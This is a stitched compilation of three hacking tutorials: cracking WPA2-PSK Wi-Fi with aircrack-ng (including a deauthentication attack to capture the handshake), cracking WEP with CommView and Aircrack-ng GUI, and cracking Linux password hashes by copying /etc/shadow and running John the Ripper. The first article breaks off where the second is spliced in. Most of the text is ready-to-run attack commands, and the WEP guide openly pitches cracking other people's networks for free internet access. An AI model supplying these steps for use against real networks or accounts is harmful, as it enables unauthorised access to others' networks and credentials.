How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng'

Welcome back, my cyber hackers.

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.

As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.

The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.

In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ngand a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:

• airmon-ng start wlan0

Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.

This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:

• airodump-ng mon0

Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:

• airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0

• 08:86:30:74:22:76 is the BSSID of the AP
• -c 6 is the channel the AP is operating on
• WPAcrack is the file you want to write to
• mon0 is the monitoring wireless adapter*

As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:

• aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0

• 100 is the number of de-authenticate frames you want to send
• 08:86:30:74:22:76 is the BSSID of the AP
• mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.

Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack nameddarkcOde.

We'll now attempt to crack the password by opening another terminal and typing:

• aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

• WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
• /pentest/passwords/wordlist/darkc0de is the absolute path to your password file

How 
to Crack Wi-Fi Passwords—For Beginners!

An internet connection has become a basic necessity in our modern lives. Wireless hotspots (commonly known as Wi-Fi) can be found everywhere!

If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key.

Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down.

Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide which will teach even complete beginners how to crack WEP encrypted networks, easily.

If it's WPA2-PSK passwords you need to crack, you can use aircrack-ng orcoWPAtty.
Table of Contents
How are wireless networks secured?
What you'll need
Setting up CommView for Wi-Fi
Selecting the target network and capturing packets
Waiting...
Now the interesting part... CRACKING!
Are you a visual learner?
Step 1: How Are Wireless Networks Secured?

In a secured wireless connection, internet data is sent in the form of encrypted packets. These packets are encrypted with network security keys. If you somehow manage to get hold of the key for a particular wireless network you virtually have access to the wireless internet connection.

Broadly speaking, there are two main types of encryptions used.
WEP (Wired Equivalent Privacy)

This is the most basic form of encryption. This has become an unsafe option as it is vulnerable and can be cracked with relative ease. Although this is the case many people still use this encryption.
WPA (Wi-Fi Protected Access)

This is the more secure alternative. Efficient cracking of the passphrase of such a network requires the use of a wordlist with the common passwords. In other words you use the old-fashioned method of trial and error to gain access. Variations include WPA-2 which is the most secure encryption alternative till date. Although this can also be cracked using a wordlist if the password is common, this is virtually uncrackable with a strong password. That is, unless the WPA PIN is still enabled (as is the default on many routers).

Hacking WEP passwords is relatively fast, so we'll focus on how to crack them for this guide. If the only networks around you use WPA passwords, you'll want to follow this guide on how to crack WPA Wi-Fi passwordsinstead.
Step 2: What You'll Need
A compatible wireless adapter:

This is by far the biggest requirement.The wireless card of your computer has to be compatible with the software CommVIew. This ensures that the wireless card can go into monitor mode which is essential for capturing packets. Click here to check if your wireless card is compatible
CommView for Wi-Fi :

This software will be used to capture the packets from the desired network adapter. Click here to download the software from their website.
Aircrack-ng GUI:

After capturing the packets this software does the actual cracking. Click hereto download the software from their website.
A little patience is vital!!
Step 3: Setting Up CommView for Wi-Fi
Download the zip file of CommView for Wi-Fi from the website. Extract the file and run setup.exe to install CommView for Wi-Fi. When CommView opens for the first time it has a driver installation guide. Follow the prompts to install the driver for your wireless card.
Run CommView for Wi-Fi.
Click the play icon on the top left of the application window.

Start scanning for wireless networks.

CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network.
Step 4: Selecting the Target Network and Capturing Packets

A few things to keep in mind before choosing the target wireless network:
This tutorial is only for WEP encrypted networks, so make sure you select a network with WEP next to its name. If you need to crack a WPA encrypted network, follow this tutorial instead.
Choose a network with the highest signal.
Each network will have its details in the right column.
Make sure the WEP network you are choosing has the lowest dB (decibel) value.

Once you have chosen your target network, select it and click Capture to start capturing packets from the desired channel.

Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network follow the given steps.
Right click the desired network and click on copy MAC Address.
Switch to the Rules tab on the top.
On the left hand side choose MAC Addresses.
Enable MAC Address rules.
For 'Action' select 'capture' and for 'Add record' select 'both'.
Now paste the mac address copied earlier in the box below.

We need to capture only data packets for cracking. So, select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets).

Now you have to save the packets so that they can be cracked later. To do this:
Go to the logging tab on top and enable auto saving.
Set Maximum Directory Size to 2000.
Set Average Log File Size to 20.
Step 5: Waiting...

Now the boring part- WAITING!

NOTE: The amount of time taken to capture enough data packets depends on the signal and the networks usage. The minimum number of packets you should capture should be 100,000 for a decent signal.

After you think you have enough packets (at least 100,000 packets), you'll need to export them.
Go to the log tab and click on concatenate logs.
Select all the logs that have been saved.
Do not close CommView for Wi-Fi.
Now navigate to the folder where the concatenated logs have been saved.
Open the log file.
Select File- Export -Wire shark tcpdump format and choose any suitable destination.
This will save the logs with a .cap extension to that location.
Step 6: Now the Interesting Part... CRACKING!
Download Aircrack-ng and extract the zip file.
Open the folder and navigate to 'bin'.
Run Aircrack-ng GUI.
Choose WEP.
Open your .cap file that you had saved earlier.
Click Launch.
In the command prompt type in the index number of your target wireless network.
Wait for a while. If everything goes fine, the wireless key will be shown.

You may also receive a request to try with more packets. In this case wait until more packets have been captured and repeat the steps to be performed after capturing packets.

BEST OF LUCK!
Step 7: Are You a Visual Learner?

Just in case you didn't understand, you can watch this video walk-through.

Hack Like a Pro: How to Crack User Passwords in a Linux System

Welcome back, my eager hackers!

In recent blogs, I've demonstrated how to grab password hashes remotely using Metasploit's meterpreter and pwdump. Once we have the Windows passwords from the SAM file, we can then crack these hashes using tools such as Cain and Abel.

In this article, we'll look at how to grab the password hashes from a Linux system and crack the hashes using probably the most widely used password cracking tool out there, John the Ripper.

Let's boot up BackTrack and get hacking!

Step 1: Create Some User Accounts

Since our BackTrack system probably doesn't have many users on it other than our root account, let's go ahead and create a couple more accounts.

Let's create user1 with password "flower" and user2 with a password of "hacker".

I've purposely chosen dictionary words as the complexity of the password is inversely related to the time necessary to crack it. One of the nice features of John the Ripper is that it will try to use a dictionary attack first. If that fails, it will try a hybrid attack. And only if that fails will it attempt a brute-force attack, which is the most time consuming.

Step 2: Open John the Ripper

Now that we have a couple of regular users in our system with simple passwords, we now need to open John the Ripper. John the Ripper is a simple, but powerful password cracker without a GUI (this helps to make it faster as GUIs consume resources).

We can access it from BackTrack by going to the BackTrack button on the bottom left, then Backtrack, Privilege Escalation, Password Attacks,Offline Attacks, and finally select John the Ripper from the multiple password cracking tools available.

If you selected the correct menu item, it will open a terminal that looks like this.

By the way, feel free to close our previous terminal as we're finished with it.

Step 3: Test John the Ripper

At the prompt, type:

• bt > john -test

This command will send John the Ripper through a variety of benchmark tests to estimate how long it will take to break the passwords on your system. Your terminal will look something like this.

Now that John has estimated how long each of the encryption schemes will take to crack, let's put him to work on cracking our passwords.

Step 4: Copy the Password Files to Our Current Directory

Linux stores its passwords in /etc/shadow, so what we want to do is copy this file to our current directory along with the /etc/passwd file, then "unshadow" them and store them in file we'll call passwords. So, let's type both:

• bt > cp /etc/shadow ./

• bt > cp /etc/passwd ./

In Linux, the cp command means copy and the ./ represents our current directory. So this command says, copy the contents of /etc/shadow to my current directory. We do the same for the /etc/passwd file.

Step 5: Unshadow

Next we need to combine the information in the /etc/shadow and the /etc/passwd files, so that John can do its magic.

• bt > ./unshadow passwd shadow > passwords

Step 6: Crack!

Now that we have unshadowed the critical files, we can simply let John run on our password file.

• bt > john passwords

John the Ripper will proceed to attempt to crack your passwords. As you can see, it cracked all three of ours in a matter of seconds! Of course, more complex passwords will take significantly more time, but all we need is just one user with a simple password and we have access to the account in seconds.

It's also important to note that any password cracker is only as good as its word list. For more complex or hybrid passwords, you probably want to use a password list containing far more passwords, including hybrid passwords such "p@$$w0rd" that combine special characters into words.

We'll be doing more password cracking among numerous other hacks, so keep coming back! And if you have any questions, feel free to comment below or head to the Null Byte forum for help.